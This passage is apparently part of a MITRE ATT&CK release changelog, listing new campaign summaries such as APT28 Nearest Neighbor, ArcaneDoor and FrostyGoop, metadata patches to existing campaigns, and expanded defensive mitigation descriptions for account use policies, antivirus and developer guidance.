| Spider](https://attack.mitre.org/groups/G0102) possesses a | | Spider](https://attack.mitre.org/groups/G0102) possesses a |
| diverse aresenal of tools and has conducted ransomware campa | | diverse arsenal of tools and has conducted ransomware campai |
| igns against a variety of organizations, ranging from major | | gns against a variety of organizations, ranging from major c |
| corporations to hospitals.(Citation: CrowdStrike Ryuk Januar | | orporations to hospitals.(Citation: CrowdStrike Ryuk January |
| y 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare O | | 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare Oc |
| ctober 2020)(Citation: CrowdStrike Wizard Spider October 202 | | tober 2020)(Citation: CrowdStrike Wizard Spider October 2020 |
| 0) | | ) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-03 20:21:34.872000+00:00 | 2025-03-12 20:33:21.597000+00:00 |
| description | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse aresenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020) | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020) |
Campaigns
enterprise-attack
New Campaigns
[C0051] APT28 Nearest Neighbor Campaign
Current version: 1.0
Description:
APT28 Nearest Neighbor Campaign was conducted by APT28 from early February 2022 to November 2024 against organizations and individuals with expertise on Ukraine. APT28 primarily leveraged living-off-the-land techniques, while leveraging the zero-day exploitation of CVE-2022-38028. Notably, APT28 leveraged Wi-Fi networks in close proximity to the intended target to gain initial access to the victim environment. By daisy-chaining multiple compromised organizations nearby the intended target, APT28 discovered dual-homed systems (with both a wired and wireless network connection) to enable Wi-Fi and use compromised credentials to connect to the victim network.(Citation: Nearest Neighbor Volexity)
[C0046] ArcaneDoor
Current version: 1.0
Description:
ArcaneDoor is a campaign targeting networking devices from Cisco and other vendors between July 2023 and April 2024, primarily focused on government and critical infrastructure networks. ArcaneDoor is associated with the deployment of the custom backdoors Line Runner and Line Dancer. ArcaneDoor is attributed to a group referred to as UAT4356 or STORM-1849, and is assessed to be a state-sponsored campaign.(Citation: Cisco ArcaneDoor 2024)(Citation: CCCS ArcaneDoor 2024)
[C0053] FLORAHOX Activity
Current version: 1.0
Description:
FLORAHOX Activity is conducted using a hybrid operational relay box (ORB) network, which combines two types of infrastructure: compromised devices and leased Virtual Private Servers (VPS). The compromised devices include end-of-life routers and IoT devices, while VPS space is commercially leased and managed by ORB network administrators. This hybrid ORB network allows adversaries to proxy and obscure malicious traffic, making the source of the traffic more difficult to trace.
The FLORAHOX ORB network has been leveraged by multiple cyber threat actors, including China-nexus actors like ZIRCONIUM. These adversaries conduct espionage campaigns through FLORAHOX Activity, relying on the ORB network's ability to funnel traffic through Tor nodes, provisioned VPS servers, and compromised routers to obfuscate malicious traffic.(Citation: ORB Mandiant)
[C0041] FrostyGoop Incident
Current version: 1.0
Description:
FrostyGoop Incident took place in January 2024 against a municipal district heating company in Ukraine. Following initial access via likely exploitation of external facing services, FrostyGoop was used to manipulate ENCO control systems via legitimate Modbus commands to impact the delivery of heating services to Ukrainian civilians.(Citation: Dragos FROSTYGOOP 2024)(Citation: Nozomi BUSTLEBERM 2024)
[C0043] Indian Critical Infrastructure Intrusions
Current version: 1.0
Description:
Indian Critical Infrastructure Intrusions is a sequence of intrusions from 2021 through early 2022 linked to People’s Republic of China (PRC) threat actors, particularly RedEcho and Threat Activity Group 38 (TAG38). The intrusions appear focused on IT system breach in Indian electric utility entities and logistics firms, as well as potentially managed service providers operating within India. Although focused on OT-operating entities, there is no evidence this campaign was able to progress beyond IT breach and information gathering to OT environment access.(Citation: RecordedFuture RedEcho 2021)(Citation: RecordedFuture RedEcho 2022)
[C0050] J-magic Campaign
Current version: 1.0
Description:
The J-magic Campaign was active from mid-2023 to at least mid-2024 and featured the use of the J-magic backdoor, a custom cd00r variant tailored for use against Juniper routers. The J-magic Campaign targeted Junos OS routers serving as VPN gateways primarily in the semiconductor, energy, manufacturing, and IT sectors. (Citation: Lumen J-Magic JAN 2025)
[C0044] Juicy Mix
Current version: 1.0
Description:
Juicy Mix was a campaign conducted by OilRig throughout 2022 that targeted Israeli organizations with the Mango backdoor.(Citation: ESET OilRig Campaigns Sep 2023)
[C0049] Leviathan Australian Intrusions
Current version: 1.0
Description:
Leviathan Australian Intrusions consisted of at least two long-term intrusions against victims in Australia by Leviathan, relying on similar tradecraft such as external service exploitation followed by extensive credential capture and re-use to enable privilege escalation and lateral movement. Leviathan Australian Intrusions were focused on exfiltrating sensitive data including valid credentials for the victim organizations.(Citation: CISA Leviathan 2024)
[C0048] Operation MidnightEclipse
Current version: 1.0
Description:
Operation MidnightEclipse was a campaign conducted in March and April 2024 that involved initial exploit of zero-day vulnerability CVE-2024-3400, a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS.(Citation: Volexity UPSTYLE 2024)(Citation: Palo Alto MidnightEclipse APR 2024)
[C0042] Outer Space
Current version: 1.0
Description:
Outer Space was a campaign conducted by OilRig throughout 2021 that used the SampleCheck5000 downloader and Solar backdoor to target Israeli organizations.(Citation: ESET OilRig Campaigns Sep 2023)
[C0047] RedDelta Modified PlugX Infection Chain Operations
Current version: 1.0
Description:
RedDelta Modified PlugX Infection Chain Operations was executed by Mustang Panda from mid-2023 through the end of 2024 against multiple entities in East and Southeast Asia. RedDelta Modified PlugX Infection Chain Operations involved phishing to deliver malicious files or links to users prompting follow-on installer downloads to load PlugX on victim machines in a persistent state.(Citation: Recorded Future RedDelta 2025)
[C0052] SPACEHOP Activity
Current version: 1.0
Description:
SPACEHOP Activity is conducted through commercially leased Virtual Private Servers (VPS), otherwise known as provisioned Operational Relay Box (ORB) networks. The network leveraged for SPACEHOP Activity enabled China-nexus cyber threat actors – such as APT5 and Ke3chang – to perform network reconnaissance scanning and vulnerability exploitation. SPACEHOP Activity has historically targeted entities in North America, Europe, and the Middle East.(Citation: ORB Mandiant)
[C0045] ShadowRay
Current version: 1.0
Description:
ShadowRay was a campaign that began in late 2023 targeting the education, cryptocurrency, biopharma, and other sectors through a vulnerability (CVE-2023-48022) in the Ray AI framework named ShadowRay. According to security researchers ShadowRay was the first known instance of AI workloads being activley exploited in the wild through vulnerabilities in AI infrastructure. CVE-2023-48022, which allows access to compute resources and sensitive data for exposed instances, remains unpatched and has been disputed by the vendor as they maintain that Ray is not intended for use outside of a strictly controlled network environment.(Citation: Oligo ShadowRay Campaign MAR 2024)
Patches
[C0028] 2015 Ukraine Electric Power Attack
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-06 14:05:01.054000+00:00 | 2024-12-18 18:59:44.199000+00:00 |
| external_references[1]['description'] | Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 | Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024. |
[C0025] 2016 Ukraine Electric Power Attack
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-10 21:18:24.743000+00:00 | 2025-04-16 20:37:46.567000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0010] C0010
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-04 20:18:28.362000+00:00 | 2025-04-16 20:37:46.129000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0011] C0011
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-22 20:26:23.226000+00:00 | 2025-04-16 20:37:47.897000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0015] C0015
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-29 20:37:46.689000+00:00 | 2025-04-16 20:37:46.910000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0017] C0017
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-01-25 21:02:33.515000+00:00 | 2025-04-16 20:37:47.537000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0018] C0018
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-02-14 16:34:50.791000+00:00 | 2025-04-16 20:37:46.763000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0021] C0021
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-05 16:50:07.875000+00:00 | 2025-04-16 20:37:47.096000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0027] C0027
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-05 17:59:41.843000+00:00 | 2025-04-16 20:37:45.650000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0004] CostaRicto
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-05 15:54:36.557000+00:00 | 2025-04-16 20:37:46.418000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0001] Frankenstein
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 03:55:03.775000+00:00 | 2025-04-16 20:37:47.239000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0007] FunnyDream
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-10 16:19:33.560000+00:00 | 2025-04-16 20:37:45.985000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0012] Operation CuckooBees
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:06:05.468000+00:00 | 2025-04-16 20:37:46.274000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0023] Operation Ghost
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-06 20:25:30.658000+00:00 | 2025-04-16 20:37:47.386000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0013] Operation Sharpshooter
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-13 17:10:55.334000+00:00 | 2025-04-16 20:37:47.743000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0014] Operation Wocao
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:07:13.071000+00:00 | 2025-04-16 20:37:45.828000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0030] Triton Safety Instrumented System Attack
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-17 16:17:07.038000+00:00 | 2024-11-17 16:15:02.223000+00:00 |
| external_references[3]['description'] | Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved January 6, 2021. | Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html | https://web.archive.org/web/20200618231942/https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html |
mobile-attack
New Campaigns
[C0054] Operation Triangulation
Current version: 1.0
Description:
Operation Triangulation is a mobile campaign targeting iOS devices.(Citation: SecureList OpTriangulation 01Jun2023) The unidentified actors used zero-click exploits in iMessage attachments to gain Initial Access, then executed exploits and validators, such as Binary Validator before finally executing the TriangleDB implant.
ics-attack
New Campaigns
[C0041] FrostyGoop Incident
Current version: 1.0
Description:
FrostyGoop Incident took place in January 2024 against a municipal district heating company in Ukraine. Following initial access via likely exploitation of external facing services, FrostyGoop was used to manipulate ENCO control systems via legitimate Modbus commands to impact the delivery of heating services to Ukrainian civilians.(Citation: Dragos FROSTYGOOP 2024)(Citation: Nozomi BUSTLEBERM 2024)
Patches
[C0028] 2015 Ukraine Electric Power Attack
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-06 14:05:01.054000+00:00 | 2024-12-18 18:59:44.199000+00:00 |
| external_references[1]['description'] | Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 | Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024. |
[C0025] 2016 Ukraine Electric Power Attack
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-10 21:18:24.743000+00:00 | 2025-04-16 20:37:46.567000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0020] Maroochy Water Breach
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-05 22:00:43.353000+00:00 | 2025-04-16 21:26:23.900000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0030] Triton Safety Instrumented System Attack
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-17 16:17:07.038000+00:00 | 2024-11-17 16:15:02.223000+00:00 |
| external_references[3]['description'] | Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved January 6, 2021. | Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html | https://web.archive.org/web/20200618231942/https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html |
Mitigations
enterprise-attack
Minor Version Changes
[M1036] Account Use Policies
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Configure features related to account use like login attempt | t | Account Use Policies help mitigate unauthorized access by co |
| lockouts, specific login times, etc. | | nfiguring and enforcing rules that govern how and when accou |
| | | nts can be used. These policies include enforcing account lo |
| | | ckout mechanisms, restricting login times, and setting inact |
| | | ivity timeouts. Proper configuration of these policies reduc |
| | | es the risk of brute-force attacks, credential theft, and un |
| | | authorized access by limiting the opportunities for maliciou |
| | | s actors to exploit accounts. This mitigation can be impleme |
| | | nted through the following measures: Account Lockout Polici |
| | | es: - Implementation: Configure account lockout settings so |
| | | that after a defined number of failed login attempts (e.g., |
| | | 3-5 attempts), the account is locked for a specific time pe |
| | | riod (e.g., 15 minutes) or requires an administrator to unlo |
| | | ck it. - Use Case: This prevents brute-force attacks by limi |
| | | ting how many incorrect password attempts can be made before |
| | | the account is temporarily disabled, reducing the likelihoo |
| | | d of an attacker successfully guessing a password. Login Ti |
| | | me Restrictions: - Implementation: Set up login time polici |
| | | es to restrict when users or groups can log into systems. Fo |
| | | r example, only allowing login during standard business hour |
| | | s (e.g., 8 AM to 6 PM) for non-administrative accounts. - Us |
| | | e Case: This prevents unauthorized access outside of approve |
| | | d working hours, where login attempts might be more suspicio |
| | | us or harder to monitor. For example, if an account that is |
| | | only supposed to be active during the day logs in at 2 AM, i |
| | | t should raise an alert or be blocked. Inactivity Timeout a |
| | | nd Session Termination: - Implementation: Enforce session t |
| | | imeouts after a period of inactivity (e.g., 10-15 minutes) a |
| | | nd require users to re-authenticate if they wish to resume t |
| | | he session. - Use Case: This policy prevents attackers from |
| | | hijacking active sessions left unattended. For example, if a |
| | | n employee walks away from their computer without locking it |
| | | , an attacker with physical access to the system would be un |
| | | able to exploit the session. Password Aging Policies: - Im |
| | | plementation: Enforce password aging rules, requiring users |
| | | to change their passwords after a defined period (e.g., 90 d |
| | | ays) and ensure passwords are not reused by maintaining a pa |
| | | ssword history. - Use Case: This limits the risk of compromi |
| | | sed passwords being used indefinitely. Regular password chan |
| | | ges make it more difficult for attackers to reuse stolen cre |
| | | dentials. Account Expiration and Deactivation: - Implement |
| | | ation: Configure user accounts, especially for temporary or |
| | | contract workers, to automatically expire after a set date o |
| | | r event. Accounts that remain unused for a specific period s |
| | | hould be deactivated automatically. - Use Case: This prevent |
| | | s dormant accounts from becoming an attack vector. For examp |
| | | le, an attacker can exploit unused accounts if they are not |
| | | properly monitored or deactivated. **Tools for Implementati |
| | | on**: - Group Policy Objects (GPOs) in Windows: To enforce |
| | | account lockout thresholds, login time restrictions, session |
| | | timeouts, and password policies. - Identity and Access Mana |
| | | gement (IAM) solutions: For centralized management of user a |
| | | ccounts, session policies, and automated deactivation of acc |
| | | ounts. - Security Information and Event Management (SIEM) pl |
| | | atforms: To monitor and alert on unusual login activity, suc |
| | | h as failed logins or out-of-hours access attempts. - Multi- |
| | | Factor Authentication (MFA) Tools: To further enforce secure |
| | | login attempts, preventing brute-force or credential stuffi |
| | | ng attacks. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-21 15:52:18.525000+00:00 | 2024-12-10 15:55:53.913000+00:00 |
| description | Configure features related to account use like login attempt lockouts, specific login times, etc. | Account Use Policies help mitigate unauthorized access by configuring and enforcing rules that govern how and when accounts can be used. These policies include enforcing account lockout mechanisms, restricting login times, and setting inactivity timeouts. Proper configuration of these policies reduces the risk of brute-force attacks, credential theft, and unauthorized access by limiting the opportunities for malicious actors to exploit accounts. This mitigation can be implemented through the following measures:
Account Lockout Policies:
- Implementation: Configure account lockout settings so that after a defined number of failed login attempts (e.g., 3-5 attempts), the account is locked for a specific time period (e.g., 15 minutes) or requires an administrator to unlock it.
- Use Case: This prevents brute-force attacks by limiting how many incorrect password attempts can be made before the account is temporarily disabled, reducing the likelihood of an attacker successfully guessing a password.
Login Time Restrictions:
- Implementation: Set up login time policies to restrict when users or groups can log into systems. For example, only allowing login during standard business hours (e.g., 8 AM to 6 PM) for non-administrative accounts.
- Use Case: This prevents unauthorized access outside of approved working hours, where login attempts might be more suspicious or harder to monitor. For example, if an account that is only supposed to be active during the day logs in at 2 AM, it should raise an alert or be blocked.
Inactivity Timeout and Session Termination:
- Implementation: Enforce session timeouts after a period of inactivity (e.g., 10-15 minutes) and require users to re-authenticate if they wish to resume the session.
- Use Case: This policy prevents attackers from hijacking active sessions left unattended. For example, if an employee walks away from their computer without locking it, an attacker with physical access to the system would be unable to exploit the session.
Password Aging Policies:
- Implementation: Enforce password aging rules, requiring users to change their passwords after a defined period (e.g., 90 days) and ensure passwords are not reused by maintaining a password history.
- Use Case: This limits the risk of compromised passwords being used indefinitely. Regular password changes make it more difficult for attackers to reuse stolen credentials.
Account Expiration and Deactivation:
- Implementation: Configure user accounts, especially for temporary or contract workers, to automatically expire after a set date or event. Accounts that remain unused for a specific period should be deactivated automatically.
- Use Case: This prevents dormant accounts from becoming an attack vector. For example, an attacker can exploit unused accounts if they are not properly monitored or deactivated.
**Tools for Implementation**:
- Group Policy Objects (GPOs) in Windows: To enforce account lockout thresholds, login time restrictions, session timeouts, and password policies.
- Identity and Access Management (IAM) solutions: For centralized management of user accounts, session policies, and automated deactivation of accounts.
- Security Information and Event Management (SIEM) platforms: To monitor and alert on unusual login activity, such as failed logins or out-of-hours access attempts.
- Multi-Factor Authentication (MFA) Tools: To further enforce secure login attempts, preventing brute-force or credential stuffing attacks.
|
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[M1049] Antivirus/Antimalware
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Use signatures or heuristics to detect malicious software. | t | Antivirus/Antimalware solutions utilize signatures, heuristi |
| | | cs, and behavioral analysis to detect, block, and remediate |
| | | malicious software, including viruses, trojans, ransomware, |
| | | and spyware. These solutions continuously monitor endpoints |
| | | and systems for known malicious patterns and suspicious beha |
| | | viors that indicate compromise. Antivirus/Antimalware softwa |
| | | re should be deployed across all devices, with automated upd |
| | | ates to ensure protection against the latest threats. This m |
| | | itigation can be implemented through the following measures: |
| | | Signature-Based Detection: - Implementation: Use predefin |
| | | ed signatures to identify known malware based on unique patt |
| | | erns such as file hashes, byte sequences, or command-line ar |
| | | guments. This method is effective against known threats. - U |
| | | se Case: When malware like "Emotet" is detected, its signatu |
| | | re (such as a specific file hash) matches a known database o |
| | | f malicious software, triggering an alert and allowing immed |
| | | iate quarantine of the infected file. Heuristic-Based Detec |
| | | tion: - Implementation: Deploy heuristic algorithms that an |
| | | alyze behavior and characteristics of files and processes to |
| | | identify potential malware, even if it doesn’t match a know |
| | | n signature. - Use Case: If a program attempts to modify mul |
| | | tiple critical system files or initiate suspicious network c |
| | | ommunications, heuristic analysis may flag it as potentially |
| | | malicious, even if no specific malware signature is availab |
| | | le. Behavioral Detection (Behavior Prevention): - Implemen |
| | | tation: Use behavioral analysis to detect patterns of abnorm |
| | | al activities, such as unusual system calls, unauthorized fi |
| | | le encryption, or attempts to escalate privileges. - Use Cas |
| | | e: Behavioral analysis can detect ransomware attacks early b |
| | | y identifying behavior like mass file encryption, even befor |
| | | e a specific ransomware signature has been identified. Real |
| | | -Time Scanning: - Implementation: Enable real-time scanning |
| | | to automatically inspect files and network traffic for sign |
| | | s of malware as they are accessed, downloaded, or executed. |
| | | - Use Case: When a user downloads an email attachment, the a |
| | | ntivirus solution scans the file in real-time, checking it a |
| | | gainst both signatures and heuristics to detect any maliciou |
| | | s content before it can be opened. Cloud-Assisted Threat In |
| | | telligence: - Implementation: Use cloud-based threat intell |
| | | igence to ensure the antivirus solution can access the lates |
| | | t malware definitions and real-time threat feeds from a glob |
| | | al database of emerging threats. - Use Case: Cloud-assisted |
| | | antivirus solutions quickly identify newly discovered malwar |
| | | e by cross-referencing against global threat databases, prov |
| | | iding real-time protection against zero-day attacks. **Tool |
| | | s for Implementation**: - Endpoint Security Platforms: Use |
| | | solutions such as EDR for comprehensive antivirus/antimalwar |
| | | e protection across all systems. - Centralized Management: I |
| | | mplement centralized antivirus management consoles that prov |
| | | ide visibility into threat activity, enable policy enforceme |
| | | nt, and automate updates. - Behavioral Analysis Tools: Lever |
| | | age solutions with advanced behavioral analysis capabilities |
| | | to detect malicious activity patterns that don’t rely on kn |
| | | own signatures. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-31 13:07:15.684000+00:00 | 2024-12-10 15:58:23.136000+00:00 |
| description | Use signatures or heuristics to detect malicious software. | Antivirus/Antimalware solutions utilize signatures, heuristics, and behavioral analysis to detect, block, and remediate malicious software, including viruses, trojans, ransomware, and spyware. These solutions continuously monitor endpoints and systems for known malicious patterns and suspicious behaviors that indicate compromise. Antivirus/Antimalware software should be deployed across all devices, with automated updates to ensure protection against the latest threats. This mitigation can be implemented through the following measures:
Signature-Based Detection:
- Implementation: Use predefined signatures to identify known malware based on unique patterns such as file hashes, byte sequences, or command-line arguments. This method is effective against known threats.
- Use Case: When malware like "Emotet" is detected, its signature (such as a specific file hash) matches a known database of malicious software, triggering an alert and allowing immediate quarantine of the infected file.
Heuristic-Based Detection:
- Implementation: Deploy heuristic algorithms that analyze behavior and characteristics of files and processes to identify potential malware, even if it doesn’t match a known signature.
- Use Case: If a program attempts to modify multiple critical system files or initiate suspicious network communications, heuristic analysis may flag it as potentially malicious, even if no specific malware signature is available.
Behavioral Detection (Behavior Prevention):
- Implementation: Use behavioral analysis to detect patterns of abnormal activities, such as unusual system calls, unauthorized file encryption, or attempts to escalate privileges.
- Use Case: Behavioral analysis can detect ransomware attacks early by identifying behavior like mass file encryption, even before a specific ransomware signature has been identified.
Real-Time Scanning:
- Implementation: Enable real-time scanning to automatically inspect files and network traffic for signs of malware as they are accessed, downloaded, or executed.
- Use Case: When a user downloads an email attachment, the antivirus solution scans the file in real-time, checking it against both signatures and heuristics to detect any malicious content before it can be opened.
Cloud-Assisted Threat Intelligence:
- Implementation: Use cloud-based threat intelligence to ensure the antivirus solution can access the latest malware definitions and real-time threat feeds from a global database of emerging threats.
- Use Case: Cloud-assisted antivirus solutions quickly identify newly discovered malware by cross-referencing against global threat databases, providing real-time protection against zero-day attacks.
**Tools for Implementation**:
- Endpoint Security Platforms: Use solutions such as EDR for comprehensive antivirus/antimalware protection across all systems.
- Centralized Management: Implement centralized antivirus management consoles that provide visibility into threat activity, enable policy enforcement, and automate updates.
- Behavioral Analysis Tools: Leverage solutions with advanced behavioral analysis capabilities to detect malicious activity patterns that don’t rely on known signatures. |
| x_mitre_version | 1.1 | 1.2 |
[M1013] Application Developer Guidance
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | This mitigation describes any guidance or training given to | t | Application Developer Guidance focuses on providing develope |
| developers of applications to avoid introducing security wea | | rs with the knowledge, tools, and best practices needed to w |
| knesses that an adversary may be able to take advantage of. | | rite secure code, reduce vulnerabilities, and implement secu |
| | | re design principles. By integrating security throughout the |
| | | software development lifecycle (SDLC), this mitigation aims |
| | | to prevent the introduction of exploitable weaknesses in ap |
| | | plications, systems, and APIs. This mitigation can be implem |
| | | ented through the following measures: Preventing SQL Injec |
| | | tion (Secure Coding Practice): - Implementation: Train deve |
| | | lopers to use parameterized queries or prepared statements i |
| | | nstead of directly embedding user input into SQL queries. - |
| | | Use Case: A web application accepts user input to search a d |
| | | atabase. By sanitizing and validating user inputs, developer |
| | | s can prevent attackers from injecting malicious SQL command |
| | | s. Cross-Site Scripting (XSS) Mitigation: - Implementation |
| | | : Require developers to implement output encoding for all us |
| | | er-generated content displayed on a web page. - Use Case: An |
| | | e-commerce site allows users to leave product reviews. Prop |
| | | erly encoding and escaping user inputs prevents malicious sc |
| | | ripts from being executed in other users’ browsers. Secure |
| | | API Design: - Implementation: Train developers to authentic |
| | | ate all API endpoints and avoid exposing sensitive informati |
| | | on in API responses. - Use Case: A mobile banking applicatio |
| | | n uses APIs for account management. By enforcing token-based |
| | | authentication for every API call, developers reduce the ri |
| | | sk of unauthorized access. Static Code Analysis in the Buil |
| | | d Pipeline: - Implementation: Incorporate tools into CI/CD |
| | | pipelines to automatically scan for vulnerabilities during t |
| | | he build process. - Use Case: A fintech company integrates s |
| | | tatic analysis tools to detect hardcoded credentials in thei |
| | | r source code before deployment. Threat Modeling in the Des |
| | | ign Phase: - Implementation: Use frameworks like STRIDE (Sp |
| | | oofing, Tampering, Repudiation, Information Disclosure, Deni |
| | | al of Service, Elevation of Privilege) to assess threats dur |
| | | ing application design. - Use Case: Before launching a custo |
| | | mer portal, a SaaS company identifies potential abuse cases, |
| | | such as session hijacking, and designs mitigations like sec |
| | | ure session management. **Tools for Implementation**: - St |
| | | atic Code Analysis Tools: Use tools that can scan for known |
| | | vulnerabilities in source code. - Dynamic Application Securi |
| | | ty Testing (DAST): Use tools like Burp Suite or OWASP ZAP to |
| | | simulate runtime attacks and identify vulnerabilities. - Se |
| | | cure Frameworks: Recommend secure-by-default frameworks (e.g |
| | | ., Django for Python, Spring Security for Java) that enforce |
| | | security best practices. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-27 20:18:19.004000+00:00 | 2024-12-10 16:07:50.023000+00:00 |
| description | This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of. | Application Developer Guidance focuses on providing developers with the knowledge, tools, and best practices needed to write secure code, reduce vulnerabilities, and implement secure design principles. By integrating security throughout the software development lifecycle (SDLC), this mitigation aims to prevent the introduction of exploitable weaknesses in applications, systems, and APIs. This mitigation can be implemented through the following measures:
Preventing SQL Injection (Secure Coding Practice):
- Implementation: Train developers to use parameterized queries or prepared statements instead of directly embedding user input into SQL queries.
- Use Case: A web application accepts user input to search a database. By sanitizing and validating user inputs, developers can prevent attackers from injecting malicious SQL commands.
Cross-Site Scripting (XSS) Mitigation:
- Implementation: Require developers to implement output encoding for all user-generated content displayed on a web page.
- Use Case: An e-commerce site allows users to leave product reviews. Properly encoding and escaping user inputs prevents malicious scripts from being executed in other users’ browsers.
Secure API Design:
- Implementation: Train developers to authenticate all API endpoints and avoid exposing sensitive information in API responses.
- Use Case: A mobile banking application uses APIs for account management. By enforcing token-based authentication for every API call, developers reduce the risk of unauthorized access.
Static Code Analysis in the Build Pipeline:
- Implementation: Incorporate tools into CI/CD pipelines to automatically scan for vulnerabilities during the build process.
- Use Case: A fintech company integrates static analysis tools to detect hardcoded credentials in their source code before deployment.
Threat Modeling in the Design Phase:
- Implementation: Use frameworks like STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) to assess threats during application design.
- Use Case: Before launching a customer portal, a SaaS company identifies potential abuse cases, such as session hijacking, and designs mitigations like secure session management.
**Tools for Implementation**:
- Static Code Analysis Tools: Use tools that can scan for known vulnerabilities in source code.
- Dynamic Application Security Testing (DAST): Use tools like Burp Suite or OWASP ZAP to simulate runtime attacks and identify vulnerabilities.
- Secure Frameworks: Recommend secure-by-default frameworks (e.g., Django for Python, Spring Security for Java) that enforce security best practices. |
| x_mitre_version | 1.1 | 1.2 |
[M1048] Application Isolation and Sandboxing
Current version: 1.2
